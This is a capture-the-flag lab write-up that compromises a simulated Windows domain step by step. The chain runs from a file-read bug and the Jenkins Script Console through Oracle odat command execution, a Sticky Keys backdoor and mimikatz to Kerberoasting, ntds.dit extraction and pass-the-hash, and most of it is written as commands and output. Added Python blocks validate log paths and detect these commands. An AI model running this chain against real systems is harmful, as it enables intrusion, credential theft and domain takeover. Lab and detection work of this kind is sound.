
春秋云镜-Privilege


zzdzz, 3 December 2025

References

https://fushuling.com/index.php/2023/10/10/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7privilege/
https://blog.csdn.net/uuzeray/article/details/142372470
https://blog.csdn.net/weixin_63576152/article/details/133892513

Level 1

39.98.119.134

Scan the target with fscan:

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.119.134

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.119.134:80 open
39.98.119.134:8080 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.134:8080 code:403 len:548    title:None
[*] WebTitle http://39.98.119.134      code:200 len:54689  title:XR SHOP
[+] PocScan http://39.98.119.134/www.zip poc-yaml-backup-file

Port 80 leaks the site source (www.zip) and 8080 is Jenkins; the intended route is presumably to audit the leaked code and use it to read the Jenkins password.

In the leaked source, tools/content-log.php reads whatever file is named in its logfile parameter.

The web process runs with high privileges, so flag01 can be read directly:

http://39.98.119.134/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
 flag01: flag{10d14c20-1ad0-4ab4-96bb-91cdb1d3f063}

Hint: the Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins; try to read the password from there.

http://39.98.119.134/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
admin/510235cf43f14e83b88a9f144199655b
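The root cause in level 1 is that the logfile parameter is handed to the filesystem unchecked, so both a relative traversal and an absolute Windows path are served. The following is an added example, not code from the original site, of how such a parameter should be confined to a single log directory; the LOG_ROOT location and the .log naming rule are assumptions.

```python
import os
import re

# Assumed location of the only logs the viewer is meant to serve (not from the
# original site; the real layout of content-log.php is unknown).
LOG_ROOT = "/var/www/html/tools/logs"

# Allowlist for the file name itself: plain characters, no leading dot, .log suffix.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\.log$")


def resolve_log_file(user_value: str, root: str = LOG_ROOT) -> str:
    """Map the user-supplied 'logfile' value to a file strictly inside root.

    Raises ValueError for anything that could leave root: '..' traversal,
    either separator flavour, Windows drive letters or UNC prefixes, and
    control characters (including NUL). This is the check content-log.php
    lacked when it served ../../Users/Administrator/flag/flag01.txt and
    C:\\ProgramData\\Jenkins\\.jenkins\\secrets\\initialAdminPassword.
    """
    if any(ord(c) < 0x20 for c in user_value):
        raise ValueError("control character in logfile")
    # A bare file name never contains a separator or a drive colon, so an
    # absolute Windows path is rejected before any filesystem access.
    if "/" in user_value or "\\" in user_value or ":" in user_value:
        raise ValueError("path separators or drive letters are not allowed")
    if not SAFE_NAME.fullmatch(user_value):
        raise ValueError("logfile is not a permitted log name")
    # Defence in depth: canonicalise and confirm the result is still under root,
    # even though the allowlist already excludes '..' segments.
    root_abs = os.path.abspath(root)
    candidate = os.path.normpath(os.path.join(root_abs, user_value))
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        raise ValueError("resolved path escapes the log root")
    return candidate


def is_accepted(user_value: str) -> bool:
    """True if the value would be served, False if the hardened check rejects it."""
    try:
        resolve_log_file(user_value)
    except ValueError:
        return False
    return True
```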

Logging in with that password gives the Script Console, which is command execution:

println "net user zzdzz qwer1234@ /add".execute().text
println "net localgroup administrators zzdzz /add".execute().text

Then connect directly over RDP.

Upload fscan and scan the internal network:

C:\Users\zzdzz>C:\Users\zzdzz\Desktop\fscan322.exe -h 172.22.14.1/24 -o 1.txt

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.46:80 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file

172.22.14.7 this host, already at the highest privilege level
172.22.14.46 XR-0923
172.22.14.11 XR-DC, the domain controller
172.22.14.31 XR-ORACLE
172.22.14.16 GitLab

Bring the host online in vshell and set up a tunnel.

Level 2

Hint:

The administrator has configured GitLab in Jenkins. Try to obtain the GitLab API token and use it to reach the sensitive repositories in GitLab. With the information found there, connect to the Oracle database and take control of the ORACLE server.

First, locate the GitLab API token:

http://39.98.119.134:8080/manage/credentials/

Inspecting the credential entry shows the stored (encrypted) value:

{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}

Back in the Script Console, decrypt it to recover the plaintext GitLab PRIVATE-TOKEN:

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
glpat-7kD_qLH2PiQv_ywB9hz2

For using the token against the GitLab API, see:

Projects API | 极狐GitLab

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |jq  |grep "http_url_to_repo"
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git

In xradmin/ruoyi-admin/src/main/resources/application-druid.yml we find the Oracle credentials:

# primary data source
master:
    url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
    username: xradmin
    password: fcMyE8t9E4XdsKf

Attack Oracle with odat.

Add a user:

proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user zzdzz qwer1234@ /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators zzdzz /add'

Then connect over RDP.

flag02: flag{497df907-bd8e-4e8e-bd03-fe6856eae42b}

Level 3

Hint:

Attack the office network, gain control of an office PC, and escalate to SYSTEM through privilege abuse.

Among the repositories cloned earlier, internal-secret/credentials.txt holds the credentials for XR-0923:

zhangshuai | wSbEajHzZs

RDP directly to .46.

The account is low-privileged and cannot read the flag, so we need to escalate.

Check the current user's group memberships:

net user zhangshuai

zhangshuai is a member of the Remote Management Users group, so WinRM is available:

proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
whoami /priv

Compared with the RDP session, the WinRM session has one extra privilege: SeRestorePrivilege.

Reference: 奇安信攻防社区 - Step-by-step Windows privilege escalation

Sticky Keys escalation:

ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak
ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe

Back in the RDP session, lock the screen; pressing Shift five times at the logon screen triggers Sticky Keys, which now launches cmd as SYSTEM.

Create an account:

net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

RDP in again.

flag03: flag{01809899-c8fc-4c01-812f-0bf0bf9880f6}

Level 4

Upload mimikatz and run it as administrator to dump hashes.

Oddly, some builds do not work: of two 2.2.0 builds, one worked and one did not, so try a few.

privilege::debug
sekurlsa::logonpasswords
[00000003] Primary
 * Username : XR-0923$
 * Domain   : XIAORANG
 * NTLM     : 764ce0d23a2706f8ce59c559702f6d37
 * SHA1     : 1b4a558d371b26ed969becb5f7d68593f2bdb7c1

Kerberoasting:

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':764ce0d23a2706f8ce59c559702f6d37' -dc-ip 172.22.14.11
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':764ce0d23a2706f8ce59c559702f6d37' -dc-ip 172.22.14.11 -request-user tianjing

Save the ticket hash to hash.txt and crack it:

hashcat -a 0 -m 13100 hash.txt ../rockyou.txt
DPQSXSXgh2

Connect over WinRM:

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

whoami /priv shows that this account has a further extra privilege: SeBackupPrivilege.

On commonly abusable privileges in domain penetration and their scenarios (part 2) - Tencent Cloud Developer Community

Extracting ntds.dit with the Volume Shadow Copy service - 先知社区

On Kali, create a file raj.dsh:

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Then run unix2dos so the .dsh file uses Windows line endings:

unix2dos raj.dsh

Create any directory under C:\ and upload raj.dsh there.

Create the shadow copy:

diskshadow /s raj.dsh

Copy ntds.dit and the SYSTEM hive out of the shadow copy and download them to Kali:

RoboCopy /b z:\windows\ntds . ntds.dit
download ntds.dit
reg save HKLM\SYSTEM system
download system

This takes a while.

Extract the Administrator hash:

impacket-secretsdump -ntds ntds.dit -system system local
70c39b547b7d8adec35ad7c09fb1d277
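Every step of levels 3 and 4 leaves a process command line on the victim: cmd.exe renamed over sethc.exe, diskshadow driven by a script, robocopy /b against the NTDS directory, a SYSTEM hive export and a new local administrator. The following is an added example, not part of the original write-up, of detection rules run over constructed process-creation records in the shape of Windows 4688 events; the sample records are constructed, not real telemetry.

```python
import re

# Constructed sample records shaped like Windows 4688 process-creation events:
# (host, command line). Not real telemetry; command lines mirror the write-up.
SAMPLE_EVENTS = [
    ("XR-0923", r"ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe"),
    ("XR-0923", r"net localgroup administrators zzdzz /add"),
    ("XR-DC",   r"diskshadow /s C:\temp\raj.dsh"),
    ("XR-DC",   r"RoboCopy /b z:\windows\ntds . ntds.dit"),
    ("XR-DC",   r"reg save HKLM\SYSTEM system"),
    ("XR-DC",   r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"),  # benign
]

# One rule per step of the chain; all match case-insensitively on the command line.
RULES = {
    # cmd.exe renamed/copied over the Sticky Keys handler (accessibility backdoor).
    "accessibility_binary_replaced":
        re.compile(r"(?:^|\s)(?:ren|rename|copy|move)\b.*\bcmd\.exe\b.*\bsethc\.exe", re.I),
    # diskshadow driven by a script file: exposes a shadow copy non-interactively.
    "diskshadow_script":
        re.compile(r"\bdiskshadow(?:\.exe)?\b.*(?:/|-)s\b", re.I),
    # robocopy in backup mode (/b, relies on SeBackupPrivilege) touching NTDS.
    "ntds_backup_copy":
        re.compile(r"\brobocopy(?:\.exe)?\b.*\s/b\b.*\bntds\b", re.I),
    # SYSTEM hive export, needed to decrypt ntds.dit offline.
    "system_hive_export":
        re.compile(r"\breg(?:\.exe)?\s+save\b.*\bhklm\\system\b", re.I),
    # New member added to the local Administrators group.
    "local_admin_added":
        re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I),
}


def detect(events):
    """Return (host, rule_name, command_line) for every record matching a rule."""
    hits = []
    for host, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append((host, name, cmdline))
    return hits


def hosts_with_ntds_theft(events):
    """Hosts where shadow-copy creation, the NTDS copy and the hive export all occur."""
    needed = {"diskshadow_script", "ntds_backup_copy", "system_hive_export"}
    seen = {}
    for host, name, _ in detect(events):
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if needed <= names)
```

The correlation in hosts_with_ntds_theft is what separates a credential-store dump from ordinary backup activity: each command alone is legitimate administration, the three together on one host within a short window are not.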

Pass the hash over WinRM:

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
type /Users/Administrator/flag/flag04.txt
flag04: flag{5a06fae0-cd1c-40fa-9ea6-06a89a04e4f6}

